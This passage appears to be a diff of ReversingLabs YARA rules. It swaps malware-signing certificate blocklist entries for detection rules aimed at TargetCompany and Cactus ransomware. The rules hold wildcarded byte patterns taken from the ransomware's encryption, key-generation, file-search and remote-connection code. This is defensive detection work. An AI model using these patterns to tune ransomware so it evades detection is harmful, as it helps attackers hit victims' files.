FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 E9 ?? ?? ?? ?? 8B 55 ?? 83 + C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? 33 + C0 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 + C0 EB ?? EB ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 8B 4D ?? + 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? B8 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 0F 87 ?? + ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ?? + ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51 + FF 15 ?? ?? ?? ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Karim Lammali" and pe.signatures[i].serial=="06:47:7e:34:25:f1:44:89:95:ce:d5:39:78:9e:68:42" and 1334275199<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and $encrypt_files and $remote_server and $remote_server_2 } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0450A7C1C36951Da09C8Ad0E7F716Ff2 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Targetcompany : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects TargetCompany ransomware." author = "ReversingLabs" - id = "b4a56bbe-f2ba-52df-832d-35b92ab73683" - date = "2023-11-08" - modified = "2023-11-08" + id = "7e6983f9-2aca-5cfa-aad6-38aa64fa2062" + date = "2021-09-27" + modified = "2021-09-27" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L549-L565" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "cb594607ceef1b8d79145ad3905fb2c38d2ed3f3e6c8a0a793fc2dc9d0a21855" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.TargetCompany.yara#L1-L141" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "05fa81afa8aa1e3b9955ad24a274ddef4fb32d678902af7aae6d6c67ed3bf0fd" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "TargetCompany" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 53 68 ?? ?? ?? ?? 6A ?? 53 6A + ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? + 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 + BD ?? ?? ?? ?? ?? 75 ?? BF ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56 8D 75 ?? E8 ?? ?? ?? + ?? 50 89 5D ?? E8 ?? ?? ?? ?? 53 6A ?? E8 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? + ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 + E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 53 68 + ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 56 FF D7 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? 6A ?? 5F 53 57 56 FF B5 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 57 52 50 + 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 33 FF 3B F3 89 85 + ?? ?? ?? ?? 7F ?? 7C ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 77 ?? 33 FF 47 EB ?? B9 ?? ?? + ?? ?? 3B C1 73 ?? 53 51 56 FF B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 50 + } + $encrypt_files_p2 = { + 56 FF B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 89 95 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 3B FB 8B 3D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? + 89 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 FF B5 ?? + ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? ?? ?? ?? 8D 4D + ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 53 53 FF B5 ?? + ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? + ?? ?? ?? FF D6 E9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 3B C3 0F 84 ?? + ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 86 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 53 53 FF B5 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 FF B5 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 FF B5 ?? + ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 + FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D7 53 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF D6 8B 85 ?? ?? ?? ?? 01 85 + ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 11 85 ?? ?? ?? ?? FF 8D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 6A ?? 53 53 33 C0 50 FF B5 ?? ?? ?? ?? FF D7 8B + BD ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? + ?? 50 6A ?? 8D 45 ?? 50 57 FF D6 53 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 57 FF + D6 57 FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 + } + $remote_connection_p1 = { + 55 8B EC 83 EC ?? 53 56 33 F6 57 8D 5D ?? 89 75 ?? E8 ?? ?? ?? ?? 89 75 ?? 56 56 56 + FF 75 ?? 56 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 3B DE 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 FF 6A ?? 8D + 45 ?? 50 FF 74 BD ?? 53 FF 15 ?? ?? ?? ?? 47 83 FF ?? 72 ?? 56 56 6A ?? 56 56 FF 75 + ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? + B8 ?? ?? ?? ?? 0F 95 C1 56 49 23 C8 03 C8 81 C9 ?? ?? ?? ?? 51 56 56 56 FF 75 ?? 89 + 4D ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 6A ?? + 5F 8D 45 ?? 50 8D 45 ?? 50 6A ?? 53 89 7D ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? + 81 4D ?? ?? ?? ?? ?? 57 8D 45 ?? 50 6A ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? 8B 45 ?? FF + 75 ?? F7 D8 1B C0 50 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 FF 56 56 8D 45 ?? + 50 53 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C7 50 FF 75 ?? E8 ?? ?? ?? + ?? 59 59 8D 4D ?? 51 FF 75 ?? 89 45 ?? 03 C7 50 53 FF 15 ?? ?? ?? ?? 03 7D ?? 39 75 + ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? + 39 75 ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? + ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B C9 C3 + } + $remote_connection_p2 = { + 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 9D ?? ?? ?? ?? + 8B F9 E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 45 + ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 85 F6 75 + ?? B8 ?? ?? ?? ?? 50 8D 45 ?? 50 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 8B F8 85 F6 74 ?? 56 E8 ?? ?? ?? ?? 59 85 FF 74 ?? 57 E8 ?? ?? ?? ?? 59 FF B5 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 5F 5E 33 + CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $generate_key = { + 0F 31 0F AF C8 0F AF CE 0F AF 8D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 33 FF 47 57 53 53 + 8D 85 ?? ?? ?? ?? 50 89 8D ?? ?? ?? ?? FF D6 3B C3 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? + ?? ?? 75 ?? 6A ?? 57 53 53 8D 85 ?? ?? ?? ?? 50 FF D6 3B C3 74 ?? 8D 85 ?? ?? ?? ?? + 50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 59 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B C7 + B9 ?? ?? ?? ?? 8B 11 8B F2 C1 EE ?? 33 F2 69 F6 ?? ?? ?? ?? 03 F0 89 71 ?? 83 C1 ?? + 40 81 F9 ?? ?? ?? ?? 7C ?? 57 A3 ?? ?? ?? ?? FF 15 + } + $find_files_p1 = { + 8D 85 ?? ?? ?? ?? 53 53 50 53 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? + 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF + D6 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 33 F6 0F B7 + C6 FF 34 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? + ?? 46 66 83 FE ?? 72 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? + ?? 0F 84 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 0F B7 B5 ?? ?? ?? ?? 8D 34 B5 + } + $find_files_p2 = { + FF 36 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D3 FF 36 89 85 ?? ?? + ?? ?? FF D3 8B 8D ?? ?? ?? ?? 3B C8 0F 84 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 66 83 BD ?? + ?? ?? ?? ?? 72 ?? C6 85 ?? ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? FF 34 85 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? FE 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? + ?? 72 ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 59 85 F6 74 ?? 6A ?? 59 FF B5 ?? ?? ?? ?? 33 C0 + 8B FE F3 AB 66 8B 85 ?? ?? ?? ?? 66 89 46 ?? FF D3 8D 44 00 ?? 50 E8 ?? ?? ?? ?? 59 + FF B5 ?? ?? ?? ?? 89 46 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BF ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF B5 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 EB ?? 56 FF 15 ?? ?? ?? + ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B + 4D ?? 5F 5E 33 CD 33 C0 5B E8 ?? ?? ?? ?? C9 C2 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PS Partnership" and pe.signatures[i].serial=="04:50:a7:c1:c3:69:51:da:09:c8:ad:0e:7f:71:6f:f2" and 1362182399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($generate_key) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0F9Fbdab9B39645Cf3211F87Abb5Ddb7 : INFO FILE +rule REVERSINGLABS_Win64_Ransomware_Cactus : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Cactus ransomware." author = "ReversingLabs" - id = "ad24d2e9-ae3d-5fae-b58d-965bd1de2a99" - date = "2023-11-08" - modified = "2023-11-08" + id = "f391919a-b433-5f8d-8051-f0467118fa1b" + date = "2023-12-15" + modified = "2023-12-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L567-L583" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ba5885c7769b5ead261815880033b0df50dc4f7684fdb37398ab01bfebda0e37" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win64.Ransomware.Cactus.yara#L1-L190" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2953b67e926cb653df0de208b098da3d5c16e6690842ab28fbf8c37cd16f54d7" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Cactus" + tc_detection_factor = 5 importance = 25 + strings: + $encrypt_files_p1 = { + 55 41 57 41 56 41 55 41 54 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 + ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 48 89 95 ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? + ?? ?? ?? 48 98 48 89 C1 E8 ?? ?? ?? ?? 48 89 45 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 89 85 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C1 4C 8D 4D + ?? 4C 8D 45 ?? 48 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 + 89 54 24 ?? 48 8B 95 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 CA 48 89 C1 E8 ?? ?? ?? ?? 48 + 8D 45 ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 + ?? 48 8B 95 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 + 89 C1 E8 ?? ?? ?? ?? 48 89 C3 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA + 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA + ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 C2 + 48 8D 85 ?? ?? ?? ?? 41 89 D8 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 ?? + ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D + } + $encrypt_files_p2 = { + 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? + ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? + ?? 48 83 C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 + ?? ?? ?? ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? + ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? + ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85 ?? + ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 29 + C2 48 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 98 48 39 85 ?? ?? ?? ?? 0F 8D ?? ?? ?? + ?? 48 89 E0 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 8D 50 ?? 48 85 C0 48 0F 48 C2 48 C1 F8 + ?? 48 C1 E0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 9D ?? ?? ?? ?? 48 8D 43 ?? 48 89 85 ?? ?? + ?? ?? 48 89 D8 49 89 C4 41 BD ?? ?? ?? ?? 48 89 D8 49 89 C6 41 BF ?? ?? ?? ?? 48 89 + D8 48 83 C0 ?? 48 C1 E8 ?? 48 C1 E0 ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D 44 24 ?? 48 83 + C0 ?? 48 89 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? + ?? ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 41 89 D9 4C 8B 85 ?? ?? ?? ?? 48 89 E9 48 8D + 55 ?? 48 8B 85 ?? ?? ?? ?? 44 89 4C 24 ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? + 48 8B 85 ?? ?? ?? ?? F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? + ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 + 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 2B 85 + ?? ?? ?? ?? 48 89 C2 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 89 C1 E8 + } + $encrypt_files_p3 = { + 48 89 DA 48 8B 85 ?? ?? ?? ?? 48 01 D0 48 89 85 ?? ?? ?? ?? 90 48 89 F4 E9 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 48 63 C8 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 49 89 C8 48 + 89 C1 E8 ?? ?? ?? ?? 4C 8D 85 ?? ?? ?? ?? 48 89 E9 48 8D 55 ?? 48 8B 85 ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? 4D 89 C1 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? + F7 D8 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 48 63 D0 48 8D 85 ?? ?? ?? ?? 41 B8 ?? ?? + ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? ?? 48 + 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 85 ?? + ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 05 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 83 F0 ?? 84 + C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 98 48 8D 55 ?? 48 01 C2 48 89 E9 48 8B 85 ?? ?? ?? + ?? 49 89 C8 48 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8D 45 ?? 48 8D 95 ?? ?? ?? + ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 8B 45 ?? 4C 63 C0 48 8B 45 ?? 48 8D 95 ?? ?? + ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? + 48 8D 95 ?? ?? ?? ?? 48 8D 4A ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 83 + C0 ?? BA ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? + ?? 48 8D 4A ?? 41 B8 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 + } + $encrypt_files_p4 = { + C1 E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 + E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 41 B8 + ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 89 + C3 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 84 DB 74 ?? 48 8D 45 ?? 48 89 C1 E8 + ?? ?? ?? ?? 48 89 C1 48 8B 05 ?? ?? ?? ?? FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? + 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 DA 48 89 C1 48 8B 05 ?? ?? ?? ?? + FF D0 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 8D + 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 F4 48 89 C3 EB ?? 48 89 C3 48 8D + 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? + ?? ?? EB ?? 48 89 C3 48 8D 45 ?? 48 89 C1 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? + ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 89 D8 48 89 C1 E8 ?? ?? ?? ?? 90 48 8D A5 ?? ?? + ?? ?? 5B 5E 41 5C 41 5D 41 5E 41 5F 5D C3 + } + $find_files_p1 = { + 55 56 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 29 C4 48 8D AC 24 ?? ?? ?? ?? 48 89 8D ?? + ?? ?? ?? 48 8D 45 ?? BB ?? ?? ?? ?? 48 89 C6 EB ?? 48 89 F1 E8 ?? ?? ?? ?? 48 83 EB + ?? 48 83 C6 ?? 48 85 DB 79 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 45 ?? 48 89 C1 E8 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 + 0F 95 C0 84 C0 74 ?? 48 8B 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C1 E8 ?? ?? ?? + ?? 48 8D 85 